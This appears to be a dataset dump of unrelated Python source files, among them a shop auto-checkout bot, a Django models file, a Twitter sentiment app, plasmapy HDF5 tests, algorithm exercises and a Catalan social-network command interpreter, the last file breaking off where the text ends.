# checks main shop url for name of product
def main():
    """Poll the shop listing once; hand the page HTML to parse() when the
    product keyword appears anywhere in it."""
    r = requests.get(mainUrl).text
    if "This page cannot be found" in r:
        print("Page could not be found")
        return
    print("Looking for: " + product)
    if product in r:
        print("The item is here!")
        parse(r)
# Parses all the links
def parse(r):
    """Extract every href from the listing page and screen each one."""
    soup = BeautifulSoup(r, "html.parser")
    links = [anchor['href'] for anchor in soup.find_all('a', href=True)]
    for link in links:
        checkproduct(link)
# Check if product name is in url
def checkproduct(l):
    """If the link matches the wanted product, open it for purchase.

    BUG FIX: the original also tested an undefined global `color`, which
    raised NameError on every matching link (no `color` is defined anywhere
    in this script). The check is removed; reintroduce a module-level
    `color` setting if colour filtering is wanted.
    """
    if product in l:
        prdurl = baseUrl + l
        print(prdurl)
        buyprd(prdurl)
# Open browser with the url and buy
def buyprd(prdurl):
    """Drive a Firefox session: add the product to cart, fill checkout with
    the module-level billing constants, submit, and screenshot the result.

    Exits the whole process after submitting (one purchase per run).
    """
    browser = Browser('firefox')
    browser.visit(prdurl)
    time.sleep(.5)  # let the product page render
    print(browser.title)
    browser.find_option_by_text(selectOption).first.click()
    browser.find_by_name('commit').click()
    if browser.is_text_present('item'):
        print("Added to Cart")
    else:
        print("Error")
        return
    time.sleep(2)
    print("checking out")
    browser.visit(checkoutUrl)
    time.sleep(.5)
    print("Filling Out Billing Info")
    browser.fill("order[billing_name]", namefield)
    browser.fill("order[email]", emailfield)
    browser.fill("order[tel]", phonefield)
    print("Filling Out Address")
    browser.fill("order[billing_address]", addressfield)
    browser.fill("order[billing_zip]", zipfield)
    browser.select("order[billing_state]", statefield)
    print("Filling Out Credit Card Info")
    browser.select("credit_card[type]", cctypefield)
    browser.fill("credit_card[number]", ccnumfield)
    browser.select("credit_card[month]", ccmonthfield)
    browser.select("credit_card[year]", ccyearfield)
    browser.fill("credit_card[verification_value]", cccvcfield)
    browser.find_by_css('.terms').click()  # accept terms checkbox
    time.sleep(.2)
    print("Submitting Info")
    browser.find_by_name('commit').click()
    time.sleep(1)
    browser.driver.save_screenshot('confirmation.png')
    print("Exiting...")
    time.sleep(2)
    sys.exit(0)
# Poll the shop forever (every 8 seconds) until buyprd() exits the process.
i = 0
while True:
    # BUG FIX: the original called `test(mainUrl)` -- no `test` is defined in
    # this script, so it raised NameError immediately. `main()` (which already
    # reads the module-level mainUrl) is the intended entry point.
    main()
    print("On try number " + str(i))
    i = i + 1
    time.sleep(8)
|
992,108 | c9547dc6342c0b0109f74e5d716a4965f206225b | # -*- coding: utf-8 -*-
# Demonstration of Python string literals and escaping.
print('some string')
print('I\'m lovin\' it')   # single quotes escaped inside single-quoted string
print('C:\some\name')      # \s is kept literally, but \n becomes a newline!
print(r'C:\some\name')     # raw string: every backslash kept literally
print("I'm lovin' it")     # double quotes avoid escaping the apostrophes
print('some\n string')     # \n expands to a newline
print("some\n string")     # same behaviour in double quotes
|
992,109 | 62bde232ee96318ddbec85d863eb0661a8eed2d3 | from algorithms.primitive_algorithm_v3 import PrimitiveAlgorithm_v3
from algorithms.algorithm_v2 import Algorithm_v2
from metrics.parser_result_levenstein_metric import ParserResultLevensteinMetric
from parsers.ideal_parser import IdealParser
def get_max_distance(algorithm, golden_set):
    """Train `algorithm` on the first half of a golden set, then return
    (max_distance, page_index) over the second half.

    NOTE(review): relies on the module-level `metric` defined *below* this
    function; consider passing it as a parameter.
    """
    path = "../golden/" + golden_set + "/"
    N = 50       # number of annotated pages in the golden set
    part = 0.5   # fraction of pages used for learning
    ideal_parser = IdealParser(path)
    learn_nums = range(int(N * part))
    test_nums = range(int(N * part), N)
    markup_list = list()
    for i in learn_nums:
        markup_list.append(ideal_parser.extract_markup(str(i) + "_markup.json"))
    algorithm.directory = path
    algorithm.learn(markup_list)
    mx_dist = 0
    mx_ind = 0
    for i in test_nums:
        with open(path + str(i) + ".html", "r") as file:
            string = file.read()
        parser_result = algorithm.parse(string)
        ideal_result = ideal_parser.parse(string)
        dist = metric.distance(parser_result, ideal_result)
        if dist > mx_dist:
            mx_dist, mx_ind = dist, i
    return mx_dist, mx_ind
# Evaluate Algorithm_v2 against the "yandex" golden set.
# NOTE(review): get_max_distance() reads this module-level `metric`.
metric = ParserResultLevensteinMetric()
algorithm = Algorithm_v2("")
dist, page = get_max_distance(algorithm, "yandex")
print("Max dist = ", dist, ", page = ", page, sep="") |
992,110 | 35bf8969f763b6acab55d15b008effe989762d48 | from django.db import models
class companies(models.Model):
    """A company tracked for headlines; the name itself is the primary key."""
    # No auto serial id here: primary_key=True on company_name suppresses
    # Django's implicit id field (the original comment claimed otherwise).
    company_name = models.CharField(max_length=500, blank = False, unique = True, primary_key = True)

    def __str__(self):
        return self.company_name
class headlines(models.Model):
    """One scored news headline tied to a tracked company."""
    #question = models.ForeignKey(Question, on_delete=models.CASCADE)]
    # company_id = models.OneToOneField(
    #     companies,
    #     primary_key=True,
    #     on_delete=models.CASCADE
    # )
    # Deleting a company cascades to all of its headlines.
    company_name = models.ForeignKey(companies, on_delete = models.CASCADE)
    #company_name = models.CharField(max_length=5000, blank = False)
    title = models.CharField(max_length=5000, blank = False)
    date_posted = models.DateField(blank = False)
    week = models.IntegerField(blank = False)   # week number -- TODO confirm ISO vs. calendar convention
    year = models.IntegerField(blank = False)
    score = models.FloatField(blank = False)    # headline score -- presumably sentiment; verify against producer

    def __str__(self):
        return self.title
# Create your models here. |
992,111 | b5dd76d8590a9964804665d5ffce7d6101c4c474 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# BUG FIX: `setup` was only imported in a commented-out line, so running
# this file raised NameError. The import is restored.
from setuptools import setup

with open("README.md") as f:
    long_description = f.read()

# Pull author/version out of the package source without importing it.
# FIX: strip the trailing newline and surrounding quotes -- the original
# shipped values like " 'name'\n" straight into the package metadata.
author = None
version = None
with open('mahstery/__init__.py', 'r') as f:
    for line in f:
        if line.startswith('__author__'):
            author = line.split('=')[-1].strip().strip("'\"")
        if line.startswith('__version__'):
            version = line.split('=')[-1].strip().strip("'\"")

setup(
    name='mahstery',
    version=version,
    description='Get mass or accretion history for modified gravity simulations',
    long_description=long_description,
    author=author,
    url='https://github.com/correac/mahstery',
    license="BSD",
    keywords=['mahstery', 'cosmology', 'NFW', 'concentration', 'accretion'],
    classifiers=['Development Status :: 0',
                 'Intended Audience :: Developers',
                 'Natural Language :: English',
                 'Programming Language :: Python :: 3.0'],
    install_requires=['numpy',
                      'scipy',
                      'h5py',
                      'matplotlib']
)
|
992,112 | a45e87c478785a880227bc64c1f7d853112c196f | import streamlit as st
import pandas as pd
import numpy as np
import tweepy
from textblob import TextBlob
from wordcloud import WordCloud
import pandas as pd
import numpy as np
import re
import matplotlib.pyplot as plt
plt.style.use('fivethirtyeight')  # global matplotlib theme for all charts below
def extractTweet(number, sname, api):
    """Fetch the latest tweets from a user timeline via tweepy.

    :param number: how many tweets to pull -- NOTE(review): callers pass the
        selectbox value, a *string*; tweepy appears to tolerate it, but an
        int() conversion would be safer.
    :param sname: twitter screen name
    :param api: authenticated tweepy.API instance
    """
    posts = api.user_timeline(screen_name = sname, count = number, lang= "en", tweet_mode="extended")
    return posts
def createDataframe(posts):
    """Wrap each tweet's full text into a one-column 'Tweets' DataFrame."""
    texts = [tweet.full_text for tweet in posts]
    return pd.DataFrame(texts, columns=['Tweets'])
def cleanTxt(text):
    """Strip twitter noise (mentions, '#', retweet markers, links) from a tweet."""
    # FIX: \w+ also matches '_' -- the original [A-Za-z0-9]+ left the tail of
    # handles like @user_name behind.
    text = re.sub(r'@\w+', '', text)            # remove @mentions
    text = re.sub(r'#', '', text)               # drop the '#', keep the tag word
    text = re.sub(r'RT[\s]+', '', text)         # remove retweet marker
    text = re.sub(r'https?:\/\/\S+', '', text)  # remove hyperlinks
    return text
def getSubjectivity(text):
    """TextBlob subjectivity in [0, 1] (0 = objective, 1 = subjective)."""
    return TextBlob(text).sentiment.subjectivity

def getPolarity(text):
    """TextBlob polarity in [-1, 1] (negative .. positive)."""
    return TextBlob(text).sentiment.polarity
def getAnalysis(score):
    """Map a polarity score to a sentiment label (exactly 0 is 'Neutral')."""
    if score < 0:
        return 'Negative'
    return 'Neutral' if score == 0 else 'Positive'
# --- Streamlit page: fetch a user's tweets and visualise their sentiment ---
st.title("Twitter Sentiment Analyis")
st.set_option('deprecation.showPyplotGlobalUse', False)
tweet_extract = st.sidebar.selectbox("Select Number of Tweets to be extracted",("100","200","300"))
tweet_name = st.sidebar.selectbox("Select Whoes Tweets to be extracted",("narendramodi","BillGates","stevejobsceo"))
# Twitter API credentials -- placeholders; supply real keys via config/env.
consumerKey = 'YOUR_CONSUMER_KEY'
consumerSecret = 'YOUR_CONSUMER_SECRET'
accessToken = 'YOUR_ACCESS_TOKEN'
accessTokenSeceret = 'YOUR_ACCESS_TOKEN_SECRET'
authenticate = tweepy.OAuthHandler(consumerKey, consumerSecret)
authenticate.set_access_token(accessToken, accessTokenSeceret)
api = tweepy.API(authenticate, wait_on_rate_limit= True)
posts = extractTweet(tweet_extract,tweet_name,api)
df = createDataframe(posts)
df['Tweets'] = df['Tweets'].apply(cleanTxt)
# Create two sentiment columns plus the derived label.
df['Subjectivity'] = df['Tweets'].apply(getSubjectivity)
df['Polarity'] = df['Tweets'].apply(getPolarity)
df['Analysis'] = df['Polarity'].apply(getAnalysis)
# Plot the word cloud over all cleaned tweets.
allWords = ' '.join([twts for twts in df['Tweets']])
wordCloud = WordCloud(width = 500, height=300, random_state = 21, max_font_size=119).generate(allWords)
plt.imshow(wordCloud, interpolation="bilinear")
plt.axis('off')
st.pyplot()
# Scatter: polarity vs subjectivity, one point per tweet.
plt.figure(figsize=(8,6))
for i in range(0, df.shape[0]):
    plt.scatter(df['Polarity'][i], df['Subjectivity'][i], color='Blue')
plt.title('Sentiment Analysis')
plt.xlabel('Polarity')
plt.ylabel('Subjectivity')
st.pyplot()
# NOTE(review): result of this value_counts() is discarded.
df['Analysis'].value_counts()
# Bar chart of sentiment label counts.
plt.title('Sentiment Analysis')
plt.xlabel('Sentiment')
plt.ylabel('Counts')
df['Analysis'].value_counts().plot(kind='bar')
st.pyplot()
|
992,113 | e3b14c6b22157d4504db870bf38f7311b4a479b1 | g = sns.JointGrid(x="total_bill", y="tip", data=tips)
g = g.plot(sns.regplot, sns.distplot)
|
992,114 | 68f9f5dbcacb2b11ca64878e7b7c32ed3af9daf4 | # Рекурсивная функция для чисел Фибоначчи
def fib(n):
    """Return the n-th Fibonacci number (fib(0) == 0, fib(1) == 1).

    Iterative O(n) implementation replacing the original exponential
    double recursion; also rejects negative input explicitly (the
    original recursed forever for n < 0).

    :param n: non-negative index into the Fibonacci sequence
    :raises ValueError: if n is negative
    """
    if n < 0:
        raise ValueError("n must be non-negative")
    a, b = 0, 1
    for _ in range(n):
        a, b = b, a + b
    return a
# Read how many Fibonacci numbers to emit
n = int(input())
# Collected Fibonacci numbers
nums = []
# Open the output file
f = open('out.txt', 'w')
# Fill the list
for i in range(n):
    nums.append(fib(i))
# Print to the console: decimal, then binary, then hexadecimal
for i in range(n):
    print(nums[i], end=' ')
print('\n')
for i in range(n):
    print(bin(nums[i]), end=' ')
print('\n')
for i in range(n):
    print(hex(nums[i]), end=' ')
# Write all three representations, tab-separated, one number per line
for i in range(n):
    f.write(str(nums[i])+'\t'+str(bin(nums[i]))+'\t'+str(hex(nums[i]))+'\n')
# Close the file
f.close()
|
992,115 | 1e62cfb4a71af196cb4a4c011f7c7e5a6f1416c5 |
class Db:
    """Persistence layer for word n-gram counts.

    Wraps a DB-API connection plus a ``sql`` statement-builder object.
    The n-gram depth is stored in a parameter table so it can be
    recovered when reopening an existing database.
    """

    DEPTH_PARAM_NAME = 'depth'

    def __init__(self, conn, sql):
        self.conn = conn
        self.cursor = conn.cursor()
        self.sql = sql
        self.depth = None  # lazily loaded from the param table by get_depth()

    def setup(self, depth):
        """Create the word table, its index and the param table for *depth*."""
        self.depth = depth
        self.cursor.execute(self.sql.create_word_table_sql(depth))
        self.cursor.execute(self.sql.create_index_sql(depth))
        self.cursor.execute(self.sql.create_param_table_sql())
        self.cursor.execute(self.sql.set_param_sql(), (self.DEPTH_PARAM_NAME, depth))

    def _get_word_list_count(self, word_list):
        """Return the stored count for the exact word tuple, or 0 if absent.

        :raises ValueError: if *word_list* does not match the configured depth
        """
        if len(word_list) != self.get_depth():
            raise ValueError('Expected %s words in list but found %s' % (self.get_depth(), len(word_list)))
        self.cursor.execute(self.sql.select_count_for_words_sql(self.get_depth()), word_list)
        r = self.cursor.fetchone()
        return r[0] if r else 0

    def get_depth(self):
        """Return the n-gram depth, reading it from the param table on first use.

        :raises ValueError: if the database holds no depth parameter
        """
        if self.depth is None:  # was `== None`; identity check is the idiom
            self.cursor.execute(self.sql.get_param_sql(), (self.DEPTH_PARAM_NAME,))
            r = self.cursor.fetchone()
            if r:
                self.depth = int(r[0])
            else:
                raise ValueError('No depth value found in database, db does not seem to have been created by this utility')
        return self.depth

    def add_word(self, word_list):
        """Insert the word tuple with count 1, or increment its existing count."""
        count = self._get_word_list_count(word_list)
        if count:
            self.cursor.execute(self.sql.update_count_for_words_sql(self.get_depth()), [count + 1] + word_list)
        else:
            self.cursor.execute(self.sql.insert_row_for_words_sql(self.get_depth()), word_list + [1])

    def commit(self):
        """Commit the underlying connection."""
        self.conn.commit()

    def get_word_count(self, word_list):
        """Return a {word: count} dict for *word_list*.

        NOTE(review): the exact row shape depends on the sql builder's
        select_words_and_counts_sql query -- assumed (word, count) pairs.
        """
        counts = {}
        sql = self.sql.select_words_and_counts_sql(self.get_depth())
        for row in self.cursor.execute(sql, word_list):
            counts[row[0]] = row[1]
        return counts
|
992,116 | 38ebe623c99052bc0726048e10fe3735788e00b0 | from typing import Callable, List
from dataset_specific.ists.parse import iSTSProblemWChunk
def get_similarity_table(problem: iSTSProblemWChunk,
                         score_chunk_pair: Callable[[str, str], float]) -> List[List[float]]:
    """Score every chunk pairing between the two sides of an iSTS problem.

    Returns a len(chunks1) x len(chunks2) matrix whose cell [i][j] is
    score_chunk_pair(problem.chunks1[i], problem.chunks2[j]).
    """
    return [
        [score_chunk_pair(left, right) for right in problem.chunks2]
        for left in problem.chunks1
    ]
|
992,117 | a37e043abe4afc2c17bd5066ca08c174fd842577 | from plasmapy.classes.sources import openpmd_hdf5
from plasmapy.utils import DataStandardError
from plasmapy.data.test import rootdir
from astropy import units as u
from typing import Union, Tuple, List
import os
import pytest
class TestOpenPMD2D:
    """Test 2D HDF5 dataset based on OpenPMD."""
    # Downloaded from
    # https://github.com/openPMD/openPMD-example-datasets/blob/draft/example-2d.tar.gz
    # per the Creative Commons Zero v1.0 Universal license
    # NOTE: class attribute, so the file is opened once at import/collection
    # time and shared by every test in this class.
    h5 = openpmd_hdf5.HDF5Reader(hdf5=os.path.join(rootdir, "data00000255.h5"))
    def test_has_electric_field_with_units(self):
        # .to() raises if the quantity is not convertible to V/m
        assert self.h5.electric_field.to(u.V / u.m)
    def test_correct_shape_electric_field(self):
        # (components, y, x) for the 2D example dataset
        assert self.h5.electric_field.shape == (3, 51, 201)
    def test_has_charge_density_with_units(self):
        assert self.h5.charge_density.to(u.C / u.m**3)
    def test_correct_shape_charge_density(self):
        assert self.h5.charge_density.shape == (51, 201)
    def test_has_magnetic_field(self):
        # The 2D example carries no magnetic field data.
        with pytest.raises(AttributeError):
            self.h5.magnetic_field
    def test_has_electric_current(self):
        # The 2D example carries no electric current data.
        with pytest.raises(AttributeError):
            self.h5.electric_current
class TestOpenPMD3D:
    """Test 3D HDF5 dataset based on OpenPMD."""
    # Downloaded from
    # https://github.com/openPMD/openPMD-example-datasets/blob/draft/example-3d.tar.gz
    # per the Creative Commons Zero v1.0 Universal license
    # NOTE: class attribute -- file is opened once and shared by all tests here.
    h5 = openpmd_hdf5.HDF5Reader(hdf5=os.path.join(rootdir, "data00000100.h5"))
    def test_has_electric_field_with_units(self):
        assert self.h5.electric_field.to(u.V / u.m)
    def test_correct_shape_electric_field(self):
        # (components, z, y, x) for the 3D example dataset
        assert self.h5.electric_field.shape == (3, 26, 26, 201)
    def test_has_charge_density_with_units(self):
        assert self.h5.charge_density.to(u.C / u.m**3)
    def test_correct_shape_charge_density(self):
        assert self.h5.charge_density.shape == (26, 26, 201)
    def test_has_magnetic_field(self):
        # The 3D example carries no magnetic field data.
        with pytest.raises(AttributeError):
            self.h5.magnetic_field
    def test_has_electric_current(self):
        # The 3D example carries no electric current data.
        with pytest.raises(AttributeError):
            self.h5.electric_current
class TestOpenPMDThetaMode:
    """Test thetaMode HDF5 dataset based on OpenPMD."""
    # Downloaded from
    # https://github.com/openPMD/openPMD-example-datasets/blob/draft/example-thetaMode.tar.gz
    # per the Creative Commons Zero v1.0 Universal license
    # NOTE: class attribute -- file is opened once and shared by all tests here.
    h5 = openpmd_hdf5.HDF5Reader(hdf5=os.path.join(rootdir, "data00000200.h5"))
    def test_has_electric_field_with_units(self):
        assert self.h5.electric_field.to(u.V / u.m)
    def test_correct_shape_electric_field(self):
        # (components, modes, r, z) -- thetaMode data keeps the azimuthal modes
        assert self.h5.electric_field.shape == (3, 3, 51, 201)
    def test_has_charge_density_with_units(self):
        assert self.h5.charge_density.to(u.C / u.m**3)
    def test_correct_shape_charge_density(self):
        assert self.h5.charge_density.shape == (3, 51, 201)
    def test_has_magnetic_field_with_units(self):
        assert self.h5.magnetic_field.to(u.T)
    def test_correct_shape_magnetic_field(self):
        assert self.h5.magnetic_field.shape == (3, 3, 51, 201)
    def test_has_electric_current_with_units(self):
        assert self.h5.electric_current.to(u.A * u.kg / u.m**3)
    def test_correct_shape_electric_current(self):
        assert self.h5.electric_current.shape == (3, 3, 51, 201)
# Each row: (openPMD unitDimension 7-tuple of SI base-unit exponents
# (length, mass, time, current, temperature, amount, luminosity),
# expected equivalent astropy unit).
units_test_table = [
    ((1., 1., 0., -1., 0., 0., 2.),
     u.m * u.kg / u.amp * u.cd ** 2),
    ((1, 0, 1, 2, 0, 0, 0),
     u.m * u.s * u.amp ** 2),
    ([-3., 0., 1., 1., 0., 0., 0.],
     u.coulomb / u.m**3),
    ([2, 1, -3, -2, 0, 0, 0],
     u.ohm)
]
@pytest.mark.parametrize("openPMD_dims, expected", units_test_table)
def test_fetch_units(openPMD_dims, expected: Union[Tuple, List]):
    """_fetch_units must translate an openPMD dimension tuple into an astropy unit."""
    units = openpmd_hdf5._fetch_units(openPMD_dims)
    assert units == expected
def test_unavailable_hdf5():
    """A missing file path must raise FileNotFoundError."""
    with pytest.raises(FileNotFoundError):
        openpmd_hdf5.HDF5Reader(hdf5="this_file_does_not_exist.h5")
def test_non_openpmd_hdf5():
    """An HDF5 file lacking openPMD metadata must raise DataStandardError."""
    with pytest.raises(DataStandardError):
        openpmd_hdf5.HDF5Reader(hdf5=os.path.join(rootdir, "blank.h5"))
|
992,118 | 9979b99235b5a290576e6cacb1649026353fea4e | import unittest
class Solution:
    """Largest rectangle in a histogram via a monotonic index stack."""

    def largestRectangleArea(self, heights) -> int:
        """Return the area of the largest axis-aligned rectangle under the bars.

        Classic O(n) monotonic-stack algorithm: the stack holds indices of
        bars with non-decreasing heights. When the incoming bar is shorter
        than the stack top, the top bar's maximal rectangle is fully
        determined -- its right boundary is the incoming index and its left
        boundary is the new stack top (or -1 when the stack empties).
        A sentinel height of 0 appended to the input flushes every bar
        that is still waiting for a right boundary at the end.
        """
        best = 0
        stack = []  # indices of bars forming a non-decreasing height run
        for right, bar in enumerate(heights + [0]):  # trailing 0 = sentinel
            while stack and heights[stack[-1]] > bar:
                top = stack.pop()
                left = stack[-1] if stack else -1
                width = right - left - 1
                best = max(best, heights[top] * width)
            stack.append(right)
        return best
class TestSolution(unittest.TestCase):
    """Regression tests for Solution.largestRectangleArea."""
    def test_input1(self):
        # Best rectangle spans [6, 3, 5] at height 3 -> area 9.
        self.assertEqual(Solution().largestRectangleArea([5, 1, 6, 3, 5, 2]), 9)
    def test_input2(self):
        # Best rectangle spans [2, 4, 5, 9, ...] region -> area 16.
        self.assertEqual(Solution().largestRectangleArea([6, 7, 5, 2, 4, 5, 9, 3]), 16)
if __name__ == '__main__':
    unittest.main()
|
992,119 | 61b134d6fbcbf9efff18abb863ccdba0af2ba6e5 | import random
# Rock-paper-scissors against the computer (Turkish UI): 1 = rock (Taş),
# 2 = paper (Kağıt), 3 = scissors (Makas). First to 3 points wins.
score = 0      # human points
sys_score = 0  # computer points
print('''Yapacağınız hamleyi girin:
1)Taş
2)Kağıt
3Makas''')
while True:
    # Check win conditions before every round.
    if score == 3:
        print("Maçı sen kazandın")
        break
    if sys_score == 3:
        print("Maçı system kazandı")
        break
    hamle = int(input("Hamlenizi giriniz:"))
    # Computer move: random integer in [1, 3].
    sys_hamle = random.randrange(1,4)
    if hamle == sys_hamle:
        print("Berabere kimse puan alamadı")
        continue
    elif hamle == 1 and sys_hamle == 2:
        # Paper wraps rock -> computer scores.
        print("Kağıt taşı sarar system 1 puan kazandı")
        sys_score+=1
        continue
    elif hamle == 1 and sys_hamle == 3:
        # Rock crushes scissors -> player scores.
        print("Taş makası ezer sen 1 puan kazandın")
        score+=1
        continue
    elif hamle == 2 and sys_hamle == 1:
        print("Kağıt taşı sarar sen 1 puan kazandın")
        score+=1
        continue
    elif hamle == 2 and sys_hamle == 3:
        print("Makas kağıdı keser system 1 puan kazandı")
        sys_score+=1
        continue
    elif hamle == 3 and sys_hamle == 1:
        print("Taş makası ezer system 1 puan kazandı")
        sys_score+=1
        continue
    elif hamle == 3 and sys_hamle == 2:
        print("Makas kağıdı ezer sen 1 puan kazandın")
        score+=1
        continue
    else:
        # Any other input (e.g. 4+) falls through to this usage reminder.
        print('''Sadece bunlar:
1)Taş
2)Kağıt
3Makas''')
|
def read_file(fnm):
    """Read a comma-separated text file into a list of row lists.

    Each line is stripped, split on ',', the parsed rows are printed
    (preserving the original behaviour) and then returned so callers
    can actually use the data (the original returned None).

    :param fnm: path of the file to parse
    :return: list of lists of field strings, one inner list per line
    """
    rows = []
    # `with` guarantees the handle is closed; the original leaked it.
    with open(fnm, 'r') as fp:
        for line in fp:
            rows.append(line.strip().split(','))
    print(rows)
    return rows
def main():
    """Entry point: parse the bundled vet.txt data file."""
    x="vet.txt"
    read_file(x)
# Runs unconditionally on import; consider an `if __name__ == "__main__":` guard.
main()
|
992,121 | cc3e8b6a5d142c896438c8da736a57462fbd476f | #!/usr/bin/env python
#-*- coding: utf-8 -*-
"""
=============
Main
=============
Aquest mòdul és el que s'haurà d'inicialitzar per obtenir tota la funcionalitat.
Per començar es crearà una instancia de la :class:`iTICApp.iTICApp` i de :class:`Interpret.Interpret`. Al inicialitzar
l'intèrpret se li passarà unes quantes funcions predefinides. L'usuari podrà saber quines són escribint la commanda
help me, que li explicarà que fa cada funció i quins paràmetres requereix. A partir d'aquí, el que s'encarregarà
d'organitzar-ho tot serà l'intèrpret
Per guardar la xarxa social i que sigui accessible per totes les funcions hem inicialitzat :class:`iTICApp.iTICApp` a fora de
__name__ == "__main__" com a una variable global:
.. code-block:: python
i = iTICApp()
"""
from Interpret import *
from iTICApp import *
from getpass import getpass
i = iTICApp()
def usuari(nick):
    """
    Register a new user in the social network (Python 2 command handler).

    :param nick: list of command tokens; must contain exactly one element,
        the nick to register (a nick with spaces is rejected)
    """
    if(len(nick) > 1):
        print "El nick no pot tenir espais"
        return
    nick = nick[0]
    if(nick in i.getUsuaris()):
        print "El usuari", nick, "ja existeix"
        return
    # Prompt interactively for credentials; getpass hides the password input.
    email = raw_input("Email: ")
    password = getpass("Password: ")
    i.afegirUsuari(nick,email,password)
def hashtag(id):
"""
Afegeix un Hashtag a la xarxa social
:param id: el id del hashtag a afegir
"""
if (len(id) > 1):
print "El hashtag no pot tenir espais"
return
id = id[0]
if (id in i.getHashtags()):
print "Aquest hashtag ja existeix"
i.afegeixHashtag(id)
def publicar (info):
"""
Publicarà un post a l'usuari
:param info: Llista de strings que contindrà en primer lloc el nick de l'usuari, en segon lloc *un* hashtag i
en tercer lloc el contingut del post. Per afegir més hashtags ja es podrà fer amb :func:`Main.afegirHashtags`
"""
if(len(info) < 3):
print "Has d'incloure com a mínim tres paràmetres: nick, id i post"
nick = info[0]
id = info[1]
post=" ".join(info[2:])
i.publicarPost(nick, id, post)
def printT(info):
    """
    Print the requested information. Supported modes:

    1. users: list all users
    2. posts: list all posts in the network
    #. posts-user: list one (or more) user's posts
    #. followers-user: list a user's followers
    #. following-user: list who a user follows
    #. following-posts: list posts of the people a user follows, in
       reverse chronological order

    :param info: list of tokens; the first is the mode above, the rest
        are nicks as each mode requires
    """
    ent = info[0]
    if(ent == "users"):
        i.users()
    elif ent == "posts":
        i.posts()
    elif ent == "posts-user":
        if(len(info) <= 1):
            print "No has introduit el nick de l'usuari"
            return
        # Accepts several nicks and prints each user's posts in turn.
        for nick in info[1:]:
            i.postsUser(nick)
    elif ent == "followers-user":
        if (len(info) != 2):
            print "No has introduit el nick d'un usuari"
            return
        i.printFollowers(info[1])
    elif ent == "following-user":
        if (len(info) != 2):
            print "No has introduit el nick d'un usuari"
            return
        i.printFollowing(info[1])
    elif(ent == "following-posts"):
        if (len(info) != 2):
            print "No has introduit el nick d'un usuari"
            return
        i.printFollowingPosts(info[1])
    else:
        print "El primer paràmetre ha de ser users, posts, posts-user, followers-user, following-user o following-posts"
def afegirHashtags(info):
"""
S'utilitza per afegir varis hashtags en un post ja creat
:param info: Llista de strings on el primer serà el id del post i la resta seran els nous hashtags a afegir
"""
if (len(info) < 2):
print "Es necessiten dos paràmetres: postId i hasthatgs"
postId = info[0]
hashtags = info[1:]
for hashtagId in hashtags:
i.afegirHastagAlPost(postId, hashtagId)
def help(i):
    """
    Print the list of interpreter commands and how each one works.

    :param i: unused; required only so the interpreter can invoke this
        handler with its standard (args) calling convention
    """
    print "Ajuda per a fer instruccions:"
    print "- usuari <nick> -> Crea un usuari"
    print "- hashtag <id> -> Afegeix un hashtag a la xarxa Social"
    print "- publicar <nick> <hastag (únic)> <contingut post> -> Afegeix un post a l'usuari <nick>"
    print "- afHashtag <postId> [<hashtags>] -> Afegeix hashtags al post <id>"
    print "- follow <seguidor> <usuari a seguir> -> Es segueix a un usuari"
    print "- followers <nick> -> Printeja el nombre de followers d'un usuari"
    print "- print <ent> [<nick>] -> Per printejar infotmació. Ent pot ser:"
    print "0. users -> no és necessari posar més paràmetres. Mostrarà una llista completa d'usuaris"
    print "1. posts -> tampoc és necessari posr més paràmetres. Mostrarà una llista de tots els posts"
    print "2. posts-user -> requereix un altre paràmetre: el nick de l'usuari del qual volem saber els posts. Si ho vols saber de més d'un introdueixne els que necessitis"
    print "3. followers-user -> printeja els nicks dels followers d'un usuari"
    print "4. following-user -> printeja els nicks usuaris que segueix l'usuari"
    print "5. following-posts -> printeja els posts dels usuaris que segueix l'usuari (el paràmetre necessàri és el nick)"
def follow(nicks):
    """
    Make one user follow another.

    :param nicks: list of exactly two nicks: [follower, followee]
    """
    if(len(nicks) != 2):
        print "Has d'introduir dos usuaris (persona que segueix, persona a seguir)"
        return
    i.follow(nicks[0], nicks[1])
def userFollowers(nick):
    """
    Print a user's follower count and how many users they follow.

    :param nick: list with exactly one element, the user's nick
    """
    if (len(nick) != 1):
        print "Has d'introduir només un nick"
        return
    i.userFollow(nick[0])
if(__name__ == "__main__"):
    # Seed the network with demo users and posts.
    usuari(["Ferran"])
    usuari(["David"])
    usuari(["Eloi"])
    publicar(["Ferran", "vida", "ashdoahd", "akjshdkjah"])
    publicar(["Eloi", "vida", "ashdoahd", "akjshdkjah"])
    print "Per ajuda escriu - help me"
    # Register every command handler with the interpreter, then start its REPL.
    interpret = Interpret()
    interpret.afegeixOrdre("usuari", usuari)
    interpret.afegeixOrdre("hashtag", hashtag)
    interpret.afegeixOrdre("publicar",publicar)
    interpret.afegeixOrdre("print", printT)
    interpret.afegeixOrdre("afHashtag", afegirHashtags)
    interpret.afegeixOrdre("follow", follow)
    interpret.afegeixOrdre("followers", userFollowers)
    interpret.afegeixOrdre("help", help)
    interpret.setPrompt("- ")
    interpret.run()
|
992,122 | be529d177f2550a63848ebd91c294039d9e297bf | # created by KUMAR SHANU
# 1. Binary Search
# https://leetcode.com/problems/binary-search/
class Solution:
    def search(self, nums: list[int], target: int) -> int:
        """Return the index of *target* in sorted *nums*, or -1 if absent.

        Standard iterative binary search, O(log n).

        BUG FIX: the original annotated with ``List[int]`` but never
        imported ``typing.List``, so defining the class raised NameError;
        the builtin generic ``list[int]`` needs no import.
        """
        # Search boundaries (inclusive).
        l, r = 0, len(nums) - 1
        while l <= r:
            # Overflow-safe midpoint (habit carried over from fixed-width languages).
            mid = l + (r - l) // 2
            if nums[mid] == target:
                return mid
            if nums[mid] < target:
                # Target lies in the right half.
                l = mid + 1
            else:
                # Target lies in the left half.
                r = mid - 1
        return -1
|
992,123 | ad3dac92d738288460ce0c2091d4e46b27b3e768 | # -*- coding: utf-8 -*-
"""
Created on Sun Mar 31 16:23:50 2019
@author: Luke
"""
class Ipython():
    """Helpers for detecting an IPython interactive environment."""

    @staticmethod
    def run_from_ipython():
        """Return True when executing inside IPython, else False."""
        try:
            __IPYTHON__  # noqa: F821 -- injected into builtins by IPython only
        except NameError:
            return False
        return True
class timing():
    """Wall-clock execution-time guard.

    Call ``timing.start(max_duration)`` before a computation and
    ``timing.check()`` periodically inside it; ``check`` raises
    ``timing.ExecutionTimeout`` once the budget is exceeded.

    BUG FIX: the original methods referenced class-body names (``local``,
    ``start``, ``check``, ``ExecutionTimeout``) unqualified, which raises
    NameError at call time -- class scope is not visible from method
    bodies. All references are now qualified via ``timing.`` and the
    functions are explicit staticmethods.
    """
    import threading
    from datetime import datetime, timedelta

